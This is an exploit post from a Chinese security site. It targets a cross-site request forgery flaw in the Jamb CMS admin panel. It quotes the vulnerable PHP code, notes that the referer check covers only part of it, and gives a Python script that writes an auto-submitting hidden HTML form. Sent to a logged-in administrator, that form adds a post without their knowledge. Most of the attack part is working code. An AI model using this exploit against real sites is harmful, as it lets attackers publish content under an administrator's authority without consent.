首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Jamb CSRF Arbitrary Add a Post
来源:vfocus.net 作者:Stoke 发布时间:2010-10-25  

#!/usr/bin/python
#########################################################
#  ____                      ___              __      __                                            
# /\  _`\                 __/\_ \           /'__`\   /\ \                                           
# \ \ \/\ \    __  __  __/\_\//\ \     ___ /\ \/\ \  \_\ \     __         ___  _ __   __  __  __  __
#  \ \ \ \ \ /'__`\\ \/\ \/\ \\ \ \   /'___\ \ \ \ \ /'_` \  /'__`\      /'___\\`'__\'__`\\ \/\ \/\ \
#   \ \ \_\ \\  __/ \ \_/ | \ \\_\ \_/\ \__/\ \ \_\ \\ \L\ \/\  __/     /\ \__/ \ \/\  __/ \ \_/ \_/ \
#    \ \____/ \____\ \___/ \ \_\\____\ \____\\ \____/ \___,_\ \____\    \ \____\ \_\ \____\ \___x___/'
#     \/___/ \/____/\/__/   \/_//____/\/____/ \/___/ \/__,_ /\/____/     \/____/\/_/\/____/\/__//__/
#
# Crew Members: bl3ck, stoke, Shellcoder_, n1md4, sys.x4sh, Ax3L, s1y, LostPassword, nex & overmind
#
#
# Author: stoke
#
#
#
#
# Jamb CMS CSRF Arbitrary add a post
#
# Jamb can be downloaded here: http://darkjoker.sytes.net/archives/jamb.zip
#
# Let's see the bugged code:
# ---- snip from admin.php -----
"""
if ($_GET ['act'] && is_logged () && intval ($_GET['id']) && preg_match ("|http://".$_SERVER['SERVER_NAME'].dirname($_SERVER['PHP_SELF'])."|",$_SERVER['HTTP_REFERER'])) {
 $id=intval ($_GET['id']);
 switch ($_GET['act']) {
  case 'del':
   $query = "DELETE FROM articles WHERE id = '{$id}'";
   mysql_query ($query) or die ("Please edit functions.php!");
   $query = "DELETE FROM comments WHERE pid = '{$id}'";
   mysql_query ($query);
   header ("Location: index.php");
   die ();
   break;
  case 'edit':
   $newtitle = htmlentities (mysql_real_escape_string ($_POST['newtitle']));
   $newart = mysql_real_escape_string ($_POST['newart']);
   if (!$newtitle || !$newart) {
    $query = "SELECT * FROM articles WHERE id = '{$id}'";
    $res=mysql_query ($query);
    $row=mysql_fetch_row ($res);
    if (!$row[0])
     die ("Wrong ID");
    $row[1]=stripslashes($row[1]);
    $row[2]=stripslashes ($row[2]);
    echo "<form action = 'admin.php?act=edit&id={$id}' method = 'POST'>\n".
     "Title: <input name = 'newtitle' value = '{$row[1]}'><br>\n".
     "<textarea rows=30 cols=100 name='newart'>{$row[2]}</textarea><br>\n".
     "<input type = 'submit' value = 'Edit'><br>\n".
     "</form>\n";
     $a=false;
   }
   else {
    $query = "UPDATE articles SET title='{$newtitle}', body='{$newart}' WHERE id = '{$id}'";
    mysql_query ($query);
    header ("Location: index.php");
    die ();
   }
   break;
  case 'delc':
   $query = "DELETE FROM comments WHERE id = '{$id}'";
   mysql_query ($query);
   header ("Location: index.php");
   die ();
   break;
  case 'editc':
   $newuname = htmlentities (mysql_real_escape_string ($_POST['newuname']));
   $newcomm = htmlentities (mysql_real_escape_string ($_POST['newcomm']));
   if (!$newuname || !$newcomm) {
    $query = "SELECT * FROM comments WHERE id = '{$id}'";
    $res = mysql_query ($query);
    $row = mysql_fetch_row ($res);

    if (!$row[0])
     die ("Wrong ID");
    $row[2]=stripslashes ($row[2]);
    $row[3]=stripslashes ($row[3]);
    echo "<form action = 'admin.php?act=editc&id={$id}' method = 'POST'>\n".
     "Author: <input name = 'newuname' value = '{$row[2]}'><br>\n".
     "<textarea rows=10 cols=25 name = 'newcomm'>{$row[3]}</textarea><br>\n".
     "<input type = 'submit' value = 'Edit'><br>\n</form>\n";
    $a=false;
   }
   else {
    $query = "UPDATE comments SET author='{$newuname}', comment='{$newcomm}' WHERE id='{$id}'";
    mysql_query ($query);
    header ("Location: index.php");
    die ();
   }
   break;
  default:
   break;
 }
}

if (is_logged () && $a) {
 $title = htmlentities (mysql_real_escape_string ($_POST['title']));
 $art = mysql_real_escape_string ($_POST['data']);
 echo $title . " ".$art;
 if (!$title || !$art) {
  echo "<form method = 'POST'>\n".
   "Title: <input name = 'title'><br>\n".
   "<textarea rows=30 cols=100 name = 'data'></textarea><br>\n".
   "<input type = 'submit' value = 'Send'><br>\n".
   "</form>\n";
 }
 else {
  $query = "INSERT INTO articles (title,body,date) VALUES ('{$title}','{$art}','".time()."');";
  mysql_query ($query);
  header ("Location: index.php");
  die ();
 }
}
"""
# ---- end snip ----
#
# How you can see, only the "act" part of code has the referer checked, this is useful (for us).
# We can exploit this issue by sending a specially .html file to the admin when he/she is logged.
#
# I write a little script for do this


from sys import argv

if len(argv) < 4:
 print "Usage: ./exploit.py <url_with_jamb_dir> <title> <content_of_post>"
 quit()
 
print ".:[Jamb CMS CSRF Arbitrary add post exploit]:.\n\n"
url = argv[1]
title = argv[2]
content = argv[3]
print "[+] Preparing the exploit"
skeleton = """
<body onload="document.getElementById('1').submit()">
<form method="POST" id="1" action="%s/admin.php">
<input type="hidden" name="title" value="%s">
<input type="hidden" name="data" value="%s">
</form>""" % (url, title, content)
enc = skeleton
print "[+] Writing the exploit"
fd = file("exploit.html", "w")
fd.write(enc)
fd.close()
print "[+] Done, check exploit.html"


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·HP Data Protector Media Operat
·AnyDVD <= 6.7.1.0 Denial Of Se
·Winamp 5.5.8.2985 (in_mod plug
·RarmaRadio v2.52 (.m3u) Denial
·ARM Bindshell port 0x1337
·GNU C library dynamic linker L
·ARM Bind Connect UDP Port 68
·Spider Player 2.4.5 Denial of
·ARM Loader Port 0x1337
·Altova DatabaseSpy 2011 Projec
·ARM ifconfig eth0 and Assign A
·Sawmill Enterprise < v8.1.7.3
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved